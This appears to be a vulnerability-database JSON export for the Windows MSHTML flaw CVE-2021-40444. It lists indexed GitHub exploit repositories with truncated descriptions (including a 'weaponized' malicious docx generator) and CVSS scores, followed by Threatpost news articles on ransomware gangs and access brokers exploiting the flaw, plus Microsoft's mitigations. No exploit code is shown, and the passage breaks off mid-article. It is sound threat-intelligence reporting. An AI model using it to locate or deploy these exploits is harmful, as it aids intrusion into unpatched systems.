"2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-28T17:13:49", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-28T19:44:48", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-19T04:22:19", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-28T16:55:39", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-11-09T18:33:13", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-11-09T18:13:40", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "trendmicroblog": [{"lastseen": "2021-09-25T08:36:17", "description": "Microsoft has disclosed the existence of a new zero-day vulnerability that affects multiple versions of Windows. This vulnerability (designated as CVE-2021-40444) is currently delivered via malicious Office 365 documents and requires user input to open the file to trigger.", "cvss3": {}, "published": "2021-09-09T00:00:00", "type": "trendmicroblog", "title": "Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-09T00:00:00", "id": "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "href": "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-29T14:37:27", "description": "Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.", "cvss3": {}, "published": "2021-09-29T00:00:00", "type": "trendmicroblog", "title": "FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-29T00:00:00", "id": "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2", "href": "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote control execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious enough that the Cybersecurity and Infrastructure Security Agency (CISA) released [an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) of its own alerting users and administrators to the vulnerability and recommending that they use the mitigations and workarounds Microsoft recommends.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)The attacker would then have to convince the user to open the malicious document for an attack to be successful, the company said. Moreover, users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights, according to the advisory.\n\n## **Affecting More than Office**\n\nThough Microsoft is still investigating the vulnerability, it could prove to go beyond affecting just Microsoft Office documents due to the ubiquitous use of MSHTML on Windows, warned Jake Williams, co-founder and CTO at incident response firm [BreachQuest](<https://breachquest.com/>).\n\n\u201cIf you\u2019ve ever opened an application that seemingly \u2018magically\u2019 knows your proxy settings, that\u2019s likely because it uses MSHTML under the hood,\u201d he said in an e-mail to Threatpost. \u201cVulnerabilities like these tend to have extremely long lifetimes for exploitation in the wild.\u201d\n\nEven if the vulnerability\u2019s reach does not go beyond Office documents, its presence and the fact that attackers are already trying to exploit are worrisome enough for organizations to take immediate action, noted another security professional.\n\nMalicious Office documents are a popular tactic with cybercriminals and state-sponsored threat actors, and the vulnerability give them \u201cmore direct exploitation of a system and the usual tricking users to disable security controls,\u201d observed John Bambenek, principal threat hunter at digital IT and security operations firm [Netenrich](<https://netenrich.com/>).\n\n\u201cAs this is already being exploited, immediate patching should be done,\u201d he advised. \u201cHowever, this is a stark reminder that in 2021, we still can\u2019t send documents from point A to point B securely.\u201d\n\n## **Mitigations and Workarounds**\n\nMicrosoft has offered some advice for organizations affected by the vulnerability\u2014first discovered by Rick Cole of the Microsoft Security Response Center, Haifei Li of EXPMON, and Dhanesh Kizhakkinan, Bryce Abdo and Genwei Jiang of Mandiant\u2013until it can offer its own security update. That may come in the form of a Patch Tuesday fix or an out-of-band patch, depending on what researchers discover, the company said.\n\nUntil then, customers should keep anti-malware products up to date, though those who use automatic updates don\u2019t need to take action now, Microsoft said. For enterprise customers who manage updates, they should select the detection build 1.349.22.0 or newer and deploy it across their environments, the company added.\n\nWorkarounds for the flaw include disabling the installation of all ActiveX controls in Internet Explorer, which mitigates a potential attack, according to Microsoft.\n\n\u201cThis can be accomplished for all sites by updating the registry,\u201d the company said in its advisory. \u201cPreviously-installed ActiveX controls will continue to run, but do not expose this vulnerability.\u201d\n\nHowever, Microsoft warned organizations to take care when using the Registry Editor, because doing so incorrectly can \u201ccause serious problems that may require you to reinstall your operating system.\u201d \u201cUse Registry Editor at your own risk,\u201d the company advised.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-08T12:24:51", "type": "threatpost", "title": "Microsoft, CISA Urge Mitigations for Zero-Day RCE Flaw in Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T12:24:51", "id": "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "href": "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-18T14:56:17", "description": "Google\u2019s Threat Analysis Group (TAG) has provided a rare look inside the operations of a cybercriminal dubbed \u201cExotic Lily,\u201d that appears to serve as an initial-access broker for both Conti and Diavol ransomware gangs.\n\nResearchers\u2019 analysis exposes the business-like approach the group takes to brokering initial access into organizations\u2019 networks through a range of tactics so its partners can engage in further malicious activity.\n\nWhile ransomware actors tend to get most of the attention, they can\u2019t do their dirty work without first gaining access to an organization\u2019s network. This is often the job of what are called initial-access brokers (IABs), or \u201cthe opportunistic locksmiths of the security world,\u201d as Google TAG calls them in [a blog post](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) published Thursday.\n\n\u201cIt\u2019s a full-time job,\u201d Google TAG researchers Vlad Stolyarov and Benoit Sevens wrote in the post. \u201cThese groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\u201d\n\nGoogle TAG first encountered Exotic Lily last September, when the group was doing just that \u2014 exploiting the [zero-day Microsoft flaw](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) in MSHTML ([CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)) as part of what turned out to be a full-time IAB business \u201cclosely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol,\u201d researchers wrote.\n\nAt the peak of the group\u2019s activity, Exotic Lily \u2014 which researchers believe is working with the Russian cybercrime gang known as FIN12, [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) or DEV-0413 \u2014 was sending more than 5,000 emails a day to as many as 650 targeted organizations globally, they said.\n\n\u201cUp until November 2021, the group seemed to be targeting specific industries such as IT, cybersecurity and healthcare, but as of late we have seen them attacking a wide variety of organizations and industries, with less specific focus,\u201d researchers wrote in the post.\n\n## **Soup to Nuts**\n\nExotic Lily works 